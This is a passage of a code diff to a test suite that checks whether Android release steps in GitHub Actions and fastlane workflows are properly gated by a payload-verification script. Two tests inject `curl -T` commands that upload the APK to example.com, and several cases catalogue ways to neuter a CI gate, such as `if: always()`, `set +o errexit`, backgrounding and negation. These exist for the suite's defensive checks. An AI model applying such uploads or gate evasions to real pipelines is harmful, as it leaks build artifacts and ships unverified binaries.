-  return [...step.run.matchAll(/fastlane\s+(\w+)/g)]
-    .map(match => lanes.find(lane => lane.name === match[1]))
-    .filter(Boolean);
+  const named = new Set(
+    [...step.run.matchAll(/fastlane\s+([\w\s]+)/g)].flatMap(match =>
+      match[1].split(/\s+/),
+    ),
+  );
+  return lanes.filter(lane => named.has(lane.name));
 }
 
 /**
@@ -166,71 +213,109 @@ function gateExamines(step) {
 }
 
 /**
- * A publisher whose bytes this parse cannot name. A glob, a bare directory and
- * a `${{ }}` expression all reach an Android build output while matching no
- * literal `.apk`/`.aab`, so a rule keyed on filenames would see nothing to
- * compare and skip the step entirely. It is refused instead: the gate cannot
- * be shown to have read bytes the parse cannot identify.
- *
- * `anyExpression` holds for a `with:` path field, where the whole value is the
- * path and an expression therefore hides one. It is cleared for a shell
- * command, where a `${{ }}` is as likely to be a tag, a secret or a token —
- * `gh release create v1.0.0` publishes no binary at all — so only an
- * expression sitting against an `.apk`/`.aab` names an artifact there.
+ * A publisher whose bytes this parse cannot name. It is refused rather than
+ * skipped: the gate cannot be shown to have read bytes the parse cannot
+ * identify, and a rule with nothing to compare reads exactly like a satisfied
+ * one.
  */
 const UNRESOLVED_PATH = '(a path this parse cannot resolve)';
 
-function reachesUnresolvedAndroidOutput(value, {anyExpression = false} = {}) {
-  const text = String(value ?? '');
-  return (
-    /build\/outputs/.test(text) ||
-    (text.includes('*') && /\.(?:apk|aab)/.test(text)) ||
-    /\$\{\{[^\n]*?\}\}[^\s"']*\.(?:apk|aab)/.test(text) ||
-    (anyExpression && text.includes('${{'))
-  );
+/**
+ * A `with:` path field, split into what it actually names. The whole value is
+ * a path here — one per line, or one per list entry — so anything that is not
+ * a concrete filename hides one, whatever directory it lives in. Keying on
+ * `build/outputs` instead would leave `dist/`, `artifacts/` and
+ * `android/app/release/` naming nothing and classifying as no publisher at all.
+ */
+function pathFieldNames(value) {
+  const tokens = (
+    Array.isArray(value) ? value : String(value ?? '').split('\n')
+  )
+    .map(token => String(token).trim())
+    .filter(Boolean);
+
+  const names = [];
+  for (const token of tokens) {
+    const base = token.split('/').pop();
+    const concrete =
+      !token.includes('${{') &&
+      !/[*?]/.test(token) &&
+      !token.endsWith('/') &&
+      /\.[A-Za-z0-9]+$/.test(base);
+    if (!concrete) {
+      names.push(UNRESOLVED_PATH);
+    } else if (/\.(?:apk|aab)$/.test(base)) {
+      names.push(base);
+    }
+  }
+  return [...new Set(names)];
 }
 
-/** Every way this repository can put built bytes in front of someone. */
+/**
+ * The same judgement over a shell command, but token by token rather than over
+ * the whole text — most of a command's words are not paths, and `gh release
+ * create v1.0.0` publishes no binary at all. Only a token that reaches an
+ * Android build output or carries an `.apk`/`.aab` is considered, and each is
+ * then resolvable or not on its own: asking the question of the whole string
+ * would mark the Play upload unresolvable because the lane that names its
+ * bundle exactly also happens to sit under `build/outputs`.
+ */
+function commandNames(text) {
+  const names = new Set();
+  for (const token of String(text ?? '').split(/[\s'"(),]+/)) {
+    if (!token || !/build\/outputs|\.(?:apk|aab)/.test(token)) {
+      continue;
+    }
+    const base = token.split('/').pop();
+    const concrete =
+      !token.includes('${{') &&
+      !/[*?]/.test(token) &&
+      !token.endsWith('/') &&
+      /\.(?:apk|aab)$/.test(base);
+    names.add(concrete ? base : UNRESOLVED_PATH);
+  }
+  return [...names];
+}
+
+/**
+ * Every way this repository can put built bytes in front of someone.
+ *
+ * Additive, not first-match. A step can be more than one of these at once —
+ * `gh release upload <dir>` appended to the Play-upload step is both — and a
+ * single path list can mix a filename the gate examined with a glob reaching a
+ * second artifact it never saw. Returning on the first match lets the second
+ * one through under cover of the first.
+ */
 function publisherOf(step, lanes) {
   const text = stepText(step, lanes);
-  // Applied to every publisher that names a path, not only the `uses:` ones:
-  // an unresolvable path leaves path identity with nothing to compare, and a
-  // vacuous rule reads exactly like a satisfied one.
-  const resolved = (source, options) => {
-    const paths = artifactsIn(source);
-    if (paths.length > 0) {
-      return paths;
-    }
-    return reachesUnresolvedAndroidOutput(source, options)
-      ? [UNRESOLVED_PATH]
-      : [];
+  const rules = [];
+  const paths = [];
+  const add = (rule, named) => {
+    rules.push(rule);
+    paths.push(...named);
   };
-  const pathsOrUnresolved = field => {
-    const paths = artifactsIn(JSON.stringify(step.with));
-    return paths.length > 0
-      ? paths
-      : resolved(String(step.with[field] ?? ''), {anyExpression: true});
-  };
+
   if (/^actions\/upload-artifact@/.test(step.uses)) {
-    const paths = pathsOrUnresolved('path');
-    return paths.length > 0 ? {rule: 'workflow-artifact', paths} : null;
+    const named = pathFieldNames(step.with.path);
+    if (named.length > 0) {
+      add('workflow-artifact', named);
+    }
   }
   if (/^softprops\/action-gh-release@/.test(step.uses)) {
-    return {rule: 'github-release', paths: pathsOrUnresolved('files')};
+    add('github-release', pathFieldNames(step.with.files));
   }
-  if (!step.run) {
-    return null;
+  if (step.run) {
+    if (/upload_to_play_store/.test(text)) {
+      add('play-upload', commandNames(text));
+    }
+    if (/\bgh\s+release\s+(?:create|upload)/.test(step.run)) {
+      add('gh-release-cli', commandNames(step.run));
+    }
+    if (gitPushArguments(step.run).length > 0) {
+      add('tag-push', []);
+    }
   }
-  if (/upload_to_play_store/.test(text)) {
-    return {rule: 'play-upload', paths: resolved(text)};
-  }
-  if (/\bgh\s+release\s+(?:create|upload)/.test(step.run)) {
-    return {rule: 'gh-release-cli', paths: resolved(step.run)};
-  }
-  if (gitPushArguments(step.run).length > 0) {
-    return {rule: 'tag-push', paths: []};
-  }
-  return null;
+  return rules.length > 0 ? {rules, paths: [...new Set(paths)]} : null;
 }
 
 function obtainsAndroidOutput(step) {
@@ -276,6 +361,11 @@ const buildsThenIsGated = (step, job, m) =>
   namesNoAndroidArtifact(step, job, m) &&
   carriesNoTransport(step, job, m);
 
+/**
+ * Never on its own either: it reads only the job, so a step inside a job that
+ * builds nothing could grow any transport it liked and stay exempt. Paired
+ * with the step half at every use.
+ */
 const runsNoAndroidGradle = (step, job, m) => !isBuildingJob(job, m.lanes);
 
 /**
@@ -290,8 +380,12 @@ const NON_PUBLISHERS = [
     job: 'build_ios',
     step: 'Build and upload iOS app',
     reason: 'uploads to TestFlight; carries no Android payload',
+    // Not `carriesNoTransport`: the iOS lane legitimately runs
+    // `upload_to_testflight`, so naming no Android artifact is the half that
+    // can hold here — and it is what goes red if this step gains one.
     assert: (step, job, m) =>
       runsNoAndroidGradle(step, job, m) &&
+      namesNoAndroidArtifact(step, job, m) &&
       m.lanes
         .filter(lane => lane.origin === 'ios')
         .every(lane => !publishesAndroid(lane.body)),
@@ -394,12 +488,35 @@ const COMPOSITE_ACTIONS = {
   ),
 };
 
-/** Takes the source, not the path, so a mutated composite can be probed. */
+/**
+ * Takes the source, not the path, so a mutated composite can be probed.
+ *
+ * Reads `with:` as well as `run:` and `uses:`, mirroring `stepText` — a
+ * composite's inner steps are steps, and the one that ships bytes is far more
+ * likely to be `uses: actions/upload-artifact@v4` with a `path:` than a raw
+ * shell command. Reading two of the three fields is how a composite that
+ * uploads the APK, or caches `build/outputs`, reads as shipping nothing.
+ */
 const shipsNothing = source => {
-  const commands = (yaml.load(source).runs.steps || [])
-    .map(step => `${step.run || ''}\n${step.uses || ''}`)
+  const steps = yaml.load(source).runs.steps || [];
+  const text = steps
+    .map(step =>
+      [step.run || '', step.uses || '', JSON.stringify(step.with || {})].join(
+        '\n',
+      ),
+    )
     .join('\n');
-  return !SENDS_BYTES_OUT.test(commands) && artifactsIn(commands).length === 0;
+  const publishes = steps.some(step =>
+    /^(?:actions\/upload-artifact|softprops\/action-gh-release)@/.test(
+      step.uses || '',
+    ),
+  );
+  return (
+    !publishes &&
+    !SENDS_BYTES_OUT.test(text) &&
+    !/build\/outputs/.test(text) &&
+    artifactsIn(text).length === 0
+  );
 };
 
 const compositeShipsNothing = step =>
@@ -523,6 +640,31 @@ const PROBE_JOB = {
   ],
 };
 
+/**
+ * The same step in a job that satisfies **every job-level predicate**: it
+ * builds nothing, and it has a gate step below the probe. Any assertion still
+ * returning true here is deciding on the job and ignoring the step it was
+ * handed — which the building-job probe above cannot reveal, because there the
+ * job half is false and the assertion never has to look at the step at all.
+ */
+const PROBE_JOB_WITHOUT_EXCUSES = {
+  workflow: 'probe.yml',
+  id: 'probe',
+  steps: [
+    PROBE_STEP,
+    {
+      workflow: 'probe.yml',
+      job: 'probe',
+      index: 2,
+      name: 'Verify the Android payload',
+      run: `node scripts/verify-android-payload.js --apk ${APK_PATH}`,
+      uses: '',
+      with: {},
+      raw: {},
+    },
+  ],
+};
+
 // -- the rules -------------------------------------------------------------
 
 function exemptionFor(step) {
@@ -608,14 +750,39 @@ function violationsOfPathIdentity(m) {
   return problems;
 }
 
+/** `if: always()` and friends run a step whatever the gate decided. */
+const RUNS_REGARDLESS =
+  /always\s*\(\s*\)|failure\s*\(\s*\)|cancelled\s*\(\s*\)/;
+
 /**
- * The gate can still fail the job. A skipped, suppressed or piped gate
- * keeps ordering and path identity green while asserting nothing: the default shell is
- * `bash -e {0}`, which sets no pipefail, so a trailing `| tee` exits with
- * tee's status.
+ * The gate can still fail the job, and a failed gate still stops the publish.
+ *
+ * Both halves, because they are the same evasion from opposite ends. A skipped,
+ * suppressed or piped gate keeps ordering and path identity green while
+ * asserting nothing — the default shell is `bash -e {0}`, which sets no
+ * pipefail, so a trailing `| tee` exits with tee's status. And a publishing
+ * step carrying `if: always()` runs on a build the gate has just refused,
+ * while its position in the job is still perfectly correct. `if: always()`
+ * appears three and seven lines above two of the uploads already, so it is the
+ * idiomatic thing to write there.
  */
 function violationsOfGateCanFail(m) {
   const problems = [];
+
+  for (const job of allJobs(m)) {
+    if (!job.steps.some(isGateStep)) {
+      continue;
+    }
+    for (const step of job.steps) {
+      const publisher = publisherOf(step, m.lanes);
+      if (publisher && RUNS_REGARDLESS.test(String(step.raw.if ?? ''))) {
+        problems.push(
+          `${where(step)} publishes under if: ${step.raw.if}, so it runs even when the gate failed`,
+        );
+      }
+    }
+  }
+
   for (const step of allSteps(m)) {
     if (!isGateStep(step)) {
       continue;
@@ -636,8 +803,10 @@ function violationsOfGateCanFail(m) {
     if (step.run.replace(/\|\|/g, '').includes('|')) {
       complain('pipes its output, so it exits with the last command status');
     }
-    if (/set\s+\+e/.test(step.run)) {
-      complain('disables errexit with set +e');
+    // `+o errexit` is the same instruction spelled long; the short form alone
+    // was the whole check.
+    if (/set\s+\+(?:e\b|o\s+errexit)/.test(step.run)) {
+      complain('disables errexit');
     }
     if (step.run.includes('--manifest')) {
       complain('passes --manifest, which is a test flag');
@@ -647,8 +816,18 @@ function violationsOfGateCanFail(m) {
       .split('\n')
       .map(line => line.trim())
       .filter(line => line && !line.startsWith('#'));
-    if (!commands[commands.length - 1].includes('verify-android-payload.js')) {
+    const final = commands[commands.length - 1] ?? '';
+    // Must *begin* the final command, not merely appear in it. `bash -e` reports
+    // no failure for a command it only inspected: `if <gate>; then …; fi` and
+    // `while <gate>; do …; done` both exit 0, as does a negated `! <gate>`.
+    // Testing only for the script's presence rewards collapsing the multi-line
+    // `if` — which the old parse did catch — onto one line.
+    if (!/^node\s+\S*verify-android-payload\.js\b/.test(final)) {
       complain('does not invoke the payload check as its final command');
+    }
+    // Backgrounded, so the shell moves on and never sees the exit status.
+    if (/&\s*$/.test(final)) {
+      complain('backgrounds the payload check with &');
     }
   }
   return problems;
@@ -741,9 +920,11 @@ describe('the parse itself', () => {
         .map(step => [step.name, publisherOf(step, committed.lanes)]),
     );
 
-    expect(steps['Upload Android app to Alpha track'].rule).toBe('play-upload');
-    expect(steps['Push the release tag'].rule).toBe('tag-push');
-    expect(steps['Create GitHub Release'].rule).toBe('github-release');
+    expect(steps['Upload Android app to Alpha track'].rules).toEqual([
+      'play-upload',
+    ]);
+    expect(steps['Push the release tag'].rules).toEqual(['tag-push']);
+    expect(steps['Create GitHub Release'].rules).toEqual(['github-release']);
 
     // Two of the three resolve to a path the identity rule can compare; a
     // tag names no artifact, so that rule is properly vacuous for it.
@@ -817,16 +998,24 @@ describe('the parse itself', () => {
 
   /**
    * An assertion that no input can falsify is not a check, and the easiest one
-   * to write by accident restates its own lookup key. One adversarial step in
-   * an ungated building job must falsify every assertion that reads a step;
-   * one that survives it exempts by decoration. Add spellings here whenever an
-   * exemption learns to read something new about a step.
+   * to write by accident restates its own lookup key or reads only the job.
+   *
+   * Two probe jobs, because one is not enough: an assertion deciding purely on
+   * the job is falsified by the building-job probe without ever looking at the
+   * step it was handed, and reads as sound. The second job satisfies every
+   * job-level predicate — builds nothing, gate below the step — so only the
+   * step half can carry it there. Add a probe whenever an exemption learns to
+   * read something new.
    */
-  it('rests no exemption on an assertion that cannot fail', () => {
+  it.each([
+    ['a building job with no gate', () => PROBE_JOB],
+    ['a job with every excuse removed', () => PROBE_JOB_WITHOUT_EXCUSES],
+  ])('rests no exemption on an assertion that cannot fail, in %s', (_l, of) => {
+    const job = of();
     for (const entry of NON_PUBLISHERS) {
       expect({
         entry: `${entry.workflow} ${entry.step}`,
-        survivesTheProbe: entry.assert(PROBE_STEP, PROBE_JOB, committed),
+        survivesTheProbe: entry.assert(PROBE_STEP, job, committed),
       }).toEqual({
         entry: `${entry.workflow} ${entry.step}`,
         survivesTheProbe: false,
@@ -841,7 +1030,7 @@ describe('the parse itself', () => {
       }
       expect({
         action,
-        survivesTheProbe: entry.assert(PROBE_STEP, PROBE_JOB, committed),
+        survivesTheProbe: entry.assert(PROBE_STEP, job, committed),
       }).toEqual({action, survivesTheProbe: false});
     }
   });
@@ -908,6 +1097,17 @@ describe('no publish outruns the payload gate', () => {
 describe('each rule is capable of failing', () => {
   const broken = () => model();
 
+  /**
+   * A synthesised step has to arrive the way a parsed one does. `parseWorkflows`
+   * runs every `run:` through `codeOf`, so a mutation that sets one directly is
+   * exercising text the real parse would never have produced — and a case built
+   * that way can pass while the reader it is meant to test does nothing.
+   */
+  const asParsed = fields => ({...fields, run: codeOf(fields.run ?? '')});
+  const appendRun = (step, extra) => {
+    step.run = codeOf(`${step.run}\n${extra}`);
+  };
+
   const stepIn = (m, workflow, job, name) => {
     const found = allJobs(m)
       .find(
@@ -946,16 +1146,18 @@ describe('each rule is capable of failing', () => {
     const job = jobIn(m, 'ci.yml', 'build-android');
     // The gate here passes --apk only, so a bundle built and uploaded beside
     // it is ordered after a gate that never opened it.
-    job.steps.push({
-      workflow: 'ci.yml',
-      job: 'build-android',
-      index: job.steps.length,
-      name: 'Upload the bundle to Play',
-      run: 'bundle exec fastlane upload_android_alpha',
-      uses: '',
-      with: {},
-      raw: {},
-    });
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Upload the bundle to Play',
+        run: 'bundle exec fastlane upload_android_alpha',
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
 
     expect(violationsOfOrdering(m)).toEqual([]);
     expect(violationsOfPathIdentity(m)).toEqual([
@@ -967,16 +1169,20 @@ describe('each rule is capable of failing', () => {
     const m = broken();
     const job = jobIn(m, 'release.yml', 'build_android');
     const gate = job.steps.findIndex(isGateStep);
-    job.steps.splice(gate + 1, 0, {
-      workflow: 'release.yml',
-      job: 'build_android',
-      index: 0,
-      name: 'Re-sign the APK',
-      run: 'apksigner sign android/app/build/outputs/apk/prod/release/app-prod-release.apk',
-      uses: '',
-      with: {},
-      raw: {},
-    });
+    job.steps.splice(
+      gate + 1,
+      0,
+      asParsed({
+        workflow: 'release.yml',
+        job: 'build_android',
+        index: 0,
+        name: 'Re-sign the APK',
+        run: 'apksigner sign android/app/build/outputs/apk/prod/release/app-prod-release.apk',
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
     reindex(job);
 
     expect(violationsOfOrdering(m)).toEqual([]);
@@ -993,7 +1199,7 @@ describe('each rule is capable of failing', () => {
       'a pipe into tee',
       step => (step.run = `${step.run.trim()} 2>&1 | tee gate.log`),
     ],
-    ['a trailing unrelated command', step => (step.run += '\necho done')],
+    ['a trailing unrelated command', step => appendRun(step, 'echo done')],
     ['a test manifest', step => (step.run += ' --manifest /tmp/weak.json')],
   ])(
     'the gate-can-fail rule catches a gate neutered by %s',
@@ -1046,6 +1252,11 @@ describe('each rule is capable of failing', () => {
    * for the spelling it can read, and a glob, a bare directory or an
    * expression reaches the same bytes while matching none of them.
    */
+  // Every spelling twice: alone, and paired with the very filename the gate
+  // above it did examine. The pairing is the one that matters — a rule that
+  // stops at the first name it recognises reports the pair as fully gated.
+  const GATED_APK =
+    'android/app/build/outputs/apk/prod/release/app-prod-release.apk';
   const SPELLINGS = [
     [
       'an explicit filename',
@@ -1063,7 +1274,19 @@ describe('each rule is capable of failing', () => {
       'cannot resolve to a filename',
     ],
     ['an expression', '${{ env.APK_PATH }}', 'cannot resolve to a filename'],
-  ];
+    // Outside build/outputs entirely: a staging directory names no artifact a
+    // filename rule can see, and keying on the Gradle path would miss it.
+    ['a staging directory', 'dist/', 'cannot resolve to a filename'],
+    ['an artifacts directory', 'artifacts/', 'cannot resolve to a filename'],
+    [
+      'a release directory',
+      'android/app/release/',
+      'cannot resolve to a filename',
+    ],
+  ].flatMap(([spelling, value, fragment]) => [
+    [spelling, value, fragment],
+    [`${spelling} beside a gated filename`, `${GATED_APK}\n${value}`, fragment],
+  ]);
 
   it.each(
     SPELLINGS.flatMap(([spelling, value, fragment]) => [
@@ -1081,20 +1304,25 @@ describe('each rule is capable of failing', () => {
   )('path identity catches %s', (_label, step, fragment) => {
     const m = broken();
     const job = jobIn(m, 'ci.yml', 'build-android');
-    job.steps.push({
-      ...step,
-      workflow: 'ci.yml',
-      job: 'build-android',
-      index: job.steps.length,
-      name: 'Ship the build output',
-      run: '',
-      raw: {},
-    });
+    job.steps.push(
+      asParsed({
+        ...step,
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Ship the build output',
+        run: '',
+        raw: {},
+      }),
+    );
 
     expect(violationsOfOrdering(m)).toEqual([]);
-    expect(violationsOfPathIdentity(m)).toEqual([
+    // Contains rather than equals: a path list naming the gated APK as well
+    // legitimately reports the interposition too, and the case is about the
+    // second path still being seen.
+    expect(violationsOfPathIdentity(m)).toContainEqual(
       expect.stringContaining(fragment),
-    ]);
+    );
   });
 
   // The command-line publishers name their paths as arguments rather than in a
@@ -1112,16 +1340,20 @@ describe('each rule is capable of failing', () => {
     const m = broken();
     const job = jobIn(m, 'ci.yml', 'build-android');
     const gate = job.steps.findIndex(isGateStep);
-    job.steps.splice(gate, 0, {
-      workflow: 'ci.yml',
-      job: 'build-android',
-      index: 0,
-      name: 'Publish the build output',
-      run,
-      uses: '',
-      with: {},
-      raw: {},
-    });
+    job.steps.splice(
+      gate,
+      0,
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: 0,
+        name: 'Publish the build output',
+        run,
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
     reindex(job);
 
     expect(violationsOfOrdering(m)).toEqual([
@@ -1139,19 +1371,23 @@ describe('each rule is capable of failing', () => {
     const m = broken();
     const job = jobIn(m, 'ci.yml', 'build-android');
     const gate = job.steps.findIndex(isGateStep);
-    job.steps.splice(gate, 0, {
-      workflow: 'ci.yml',
-      job: 'build-android',
-      index: 0,
-      name: 'Upload the APK directory',
-      run: '',
-      uses: 'actions/upload-artifact@v4',
-      with: {
-        name: 'android-release-apk',
-        path: 'android/app/build/outputs/apk/prod/release/',
-      },
-      raw: {},
-    });
+    job.steps.splice(
+      gate,
+      0,
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: 0,
+        name: 'Upload the APK directory',
+        run: '',
+        uses: 'actions/upload-artifact@v4',
+        with: {
+          name: 'android-release-apk',
+          path: 'android/app/build/outputs/apk/prod/release/',
+        },
+        raw: {},
+      }),
+    );
     reindex(job);
 
     expect(violationsOfOrdering(m)).toEqual([
@@ -1160,6 +1396,243 @@ describe('each rule is capable of failing', () => {
     expect(violationsOfPathIdentity(m)).toEqual([
       expect.stringContaining('cannot resolve to a filename'),
     ]);
+  });
+
+  // The classifier is an if-chain over a single step, so a step that is two
+  // publishers at once used to be reported as whichever came first — and the
+  // second one's path went with it.
+  it('classifies a step that is two publishers at once, not just the first', () => {
+    const m = broken();
+    const step = stepIn(
+      m,
+      'release.yml',
+      'build_android',
+      'Upload Android app to Alpha track',
+    );
+    appendRun(
+      step,
+      'gh release upload "v$VERSION" android/app/build/outputs/apk/e2e/release/',
+    );
+
+    expect(publisherOf(step, m.lanes).rules).toEqual([
+      'play-upload',
+      'gh-release-cli',
+    ]);
+    expect(violationsOfPathIdentity(m)).toEqual([
+      expect.stringContaining('cannot resolve to a filename'),
+    ]);
+  });
+
+  /**
+   * A publishing step carrying `if: always()` runs on a build the gate has
+   * just refused, while sitting in exactly the right place in the job. Ordering
+   * and path identity read position and paths; neither reads `if:`.
+   */
+  it.each([
+    [
+      'a workflow-artifact upload',
+      {
+        uses: 'actions/upload-artifact@v4',
+        with: {name: 'apk', path: GATED_APK},
+      },
+    ],
+    [
+      'a GitHub Release',
+      {uses: 'softprops/action-gh-release@v1', with: {files: GATED_APK}},
+    ],
+    ['a Play upload', {run: 'bundle exec fastlane upload_android_alpha'}],
+    ['a gh release upload', {run: `gh release upload v1.0.0 ${GATED_APK}`}],
+    ['a tag push', {run: 'git push origin "v1.0.0"'}],
+  ])(
+    'the gate-can-fail rule catches %s running under if: always()',
+    (_l, s) => {
+      const m = broken();
+      const job = jobIn(m, 'ci.yml', 'build-android');
+      job.steps.push(
+        asParsed({
+          workflow: 'ci.yml',
+          job: 'build-android',
+          index: job.steps.length,
+          name: 'Publish regardless',
+          run: '',
+          uses: '',
+          with: {},
+          ...s,
+          raw: {if: 'always()'},
+        }),
+      );
+
+      expect(violationsOfGateCanFail(m)).toEqual([
+        expect.stringContaining('runs even when the gate failed'),
+      ]);
+    },
+  );
+
+  it('leaves an if: that cannot outrun a failed gate alone', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Publish on a branch',
+        run: '',
+        uses: 'actions/upload-artifact@v4',
+        with: {name: 'apk', path: GATED_APK},
+        raw: {if: "github.ref == 'refs/heads/main'"},
+      }),
+    );
+
+    expect(violationsOfGateCanFail(m)).toEqual([]);
+  });
+
+  /**
+   * `bash -e` reports no failure for a command it merely inspected, so each of
+   * these exits 0 with the gate exiting non-zero. The multi-line `if` was
+   * already caught, which is what made collapsing it onto one line the reward.
+   */
+  it.each([
+    ['backgrounding', run => `${run.trim()} &`],
+    ['negation', run => `! ${run.trim()}`],
+    ['a single-line if', run => `if ${run.trim()}; then echo ok; fi`],
+    ['a single-line while', run => `while ${run.trim()}; do break; done`],
+    ['the long spelling of set +e', run => `set +o errexit\n${run.trim()}`],
+  ])('the gate-can-fail rule catches %s', (_label, neuter) => {
+    const m = broken();
+    const gate = stepIn(
+      m,
+      'ci.yml',
+      'build-android',
+      'Verify the Android payload',
+    );
+    gate.run = codeOf(neuter(gate.run.replace(/\\\n\s*/g, ' ')));
+
+    expect(violationsOfOrdering(m)).toEqual([]);
+    expect(violationsOfGateCanFail(m).length).toBeGreaterThan(0);
+  });
+
+  /**
+   * A `#` inside a quoted string is not a comment. Every consumer of this text
+   * is an unanchored presence test, so a truncated line can only lose matches —
+   * which always moves a step toward exempt.
+   */
+  it('does not lose the path that follows a quoted # on the same line', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    const gate = job.steps.findIndex(isGateStep);
+    // The note comes first, so a naive strip takes the artifact with it and
+    // the step publishes, as far as the parse can tell, nothing at all.
+    job.steps.splice(
+      gate,
+      0,
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: 0,
+        name: 'Publish with a note',
+        run: `gh release upload v1.0.0 --notes "Fixes #862" ${GATED_APK}`,
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
+    reindex(job);
+
+    expect(violationsOfPathIdentity(m)).toContainEqual(
+      expect.stringContaining('app-prod-release.apk'),
+    );
+  });
+
+  it('keeps an exemption red when a quoted # precedes the transport', () => {
+    const m = broken();
+    const step = stepIn(
+      m,
+      'ci.yml',
+      'build-android',
+      'Create dummy release keystore for CI',
+    );
+    const entry = NON_PUBLISHERS.find(
+      candidate => candidate.step === 'Create dummy release keystore for CI',
+    );
+    appendRun(
+      step,
+      `echo "phase #2" && curl -T ${GATED_APK} https://example.com/`,
+    );
+
+    expect(entry.assert(step, jobIn(m, 'ci.yml', 'build-android'), m)).toBe(
+      false,
+    );
+  });
+
+  /**
+   * `runsNoAndroidGradle` reads the job and discards its step, so on its own it
+   * exempts anything that job contains.
+   */
+  it('keeps the iOS upload exemption red when its step gains a transport', () => {
+    const m = broken();
+    const step = stepIn(
+      m,
+      'release.yml',
+      'build_ios',
+      'Build and upload iOS app',
+    );
+    const entry = NON_PUBLISHERS.find(
+      candidate => candidate.step === 'Build and upload iOS app',
+    );
+    appendRun(step, `curl -T ${GATED_APK} https://example.com/`);
+
+    expect(entry.assert(step, jobIn(m, 'release.yml', 'build_ios'), m)).toBe(
+      false,
+    );
+  });
+
+  /**
+   * A composite's inner steps are steps: the one that ships bytes is far more
+   * likely to be an `uses:` with a `path:` than a raw shell command, and half
+   * of what the function reads had never been shown able to fail it.
+   */
+  it.each([
+    [
+      'an upload-artifact step naming the APK',
+      `    - uses: actions/upload-artifact@v4\n      with:\n        path: ${GATED_APK}`,
+    ],
+    [
+      'an upload-artifact step naming a directory',
+      '    - uses: actions/upload-artifact@v4\n      with:\n        path: dist/',
+    ],
+    [
+      'a cache of the build output',
+      '    - uses: actions/cache@v4\n      with:\n        path: android/app/build/outputs',
+    ],
+  ])('refuses a composite carrying %s', (_label, body) => {
+    const composite = [
+      'name: probe',
+      'runs:',
+      '  using: composite',
+      '  steps:',
+      body,
+    ].join('\n');
+    expect(shipsNothing(composite)).toBe(false);
+  });
+
+  /**
+   * `release.yml/build_android` runs no `gradlew`, so its building-ness rests
+   * entirely on resolving the lane name — and the platform-prefixed form is
+   * valid here because the Fastfile declares `default_platform :android`.
+   */
+  it('still sees the release job build through a platform-prefixed lane', () => {
+    const m = broken();
+    const step = stepIn(m, 'release.yml', 'build_android', 'Build Android app');
+    step.run = step.run.replace(
+      'fastlane build_android_release',
+      'fastlane android build_android_release',
+    );
+
+    expect(
+      isBuildingJob(jobIn(m, 'release.yml', 'build_android'), m.lanes),
+    ).toBe(true);
+    expect(violationsOfOrdering(m)).toEqual([]);
   });
 
   it('the lane-split rule fails when the fastlane lanes are re-merged', () => {
@@ -1207,16 +1680,18 @@ describe('each rule is capable of failing', () => {
   it('the building-job count fails first when a fourth Android build job appears', () => {
     const m = broken();
     const job = jobIn(m, 'ci.yml', 'build-and-test');
-    job.steps.push({
-      workflow: 'ci.yml',
-      job: 'build-and-test',
-      index: job.steps.length,
-      name: 'Build Android Release',
-      run: './gradlew assembleProdRelease',
-      uses: '',
-      with: {},
-      raw: {},
-    });
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length,
+        name: 'Build Android Release',
+        run: './gradlew assembleProdRelease',
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
 
     const building = allJobs(m)
       .filter(candidate => isBuildingJob(candidate, m.lanes))

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -15,6 +15,7 @@ const MANIFEST_PATH = path.join(
 const manifest = JSON.parse(fs.readFileSync(MANIFEST_PATH, 'utf-8'));
 
 const ELF64_SHDR_SIZE = 64;
+const ELF64_EHDR_SIZE = 64;
 const ELF64_SYM_SIZE = 24;
 const ELF32_PHDR_SIZE = 32;
 const ELF64_PHDR_SIZE = 56;
@@ -69,13 +70,13 @@ function buildElf(
   });
 
   const align8 = n => n + ((8 - (n % 8)) % 8);
-  const phoff = ELF64_SHDR_SIZE;
+  const phoff = ELF64_EHDR_SIZE;
   const dynstrOffset = align8(phoff + phdrs.length);
   const dynsymOffset = align8(dynstrOffset + dynstr.length);
   const shoff = align8(dynsymOffset + dynsym.length);
   const sectionCount = omitDynsym ? 2 : 3;
 
-  const header = Buffer.alloc(ELF64_SHDR_SIZE);
+  const header = Buffer.alloc(ELF64_EHDR_SIZE);
   header.writeUInt32BE(0x7f454c46, 0);
   header.writeUInt8(2, 4); // ELFCLASS64
   header.writeUInt8(1, 5); // ELFDATA2LSB
@@ -85,7 +86,7 @@ function buildElf(
   header.writeUInt32LE(1, 20);
   header.writeBigUInt64LE(BigInt(segments.length > 0 ? phoff : 0), 0x20);
   header.writeBigUInt64LE(BigInt(shoff), 0x28);
-  header.writeUInt16LE(ELF64_SHDR_SIZE, 52);
+  header.writeUInt16LE(ELF64_EHDR_SIZE, 52);
   header.writeUInt16LE(ELF64_PHDR_SIZE, 0x36);
   header.writeUInt16LE(segments.length, 0x38);
   header.writeUInt16LE(ELF64_SHDR_SIZE, 0x3a);
@@ -258,7 +259,11 @@ function writeArchive(name, entries) {
  * every archive built above and pass having examined nothing. That is the same
  * defect the rule exists to catch, one level up.
  */
-function writeStoredArchive(name, entries, {align = 16384} = {}) {
+function writeStoredArchive(
+  name,
+  entries,
+  {align = 16384, method = 0, corruptLocalSignatureOf = null} = {},
+) {
   const files = Object.entries(entries);
   const locals = [];
   const chunks = [];
@@ -282,9 +287,12 @@ function writeStoredArchive(name, entries, {align = 16384} = {}) {
     }
 
     const header = Buffer.alloc(30);
-    header.writeUInt32LE(0x04034b50, 0);
+    header.writeUInt32LE(
+      entry === corruptLocalSignatureOf ? 0x05034b50 : 0x04034b50,
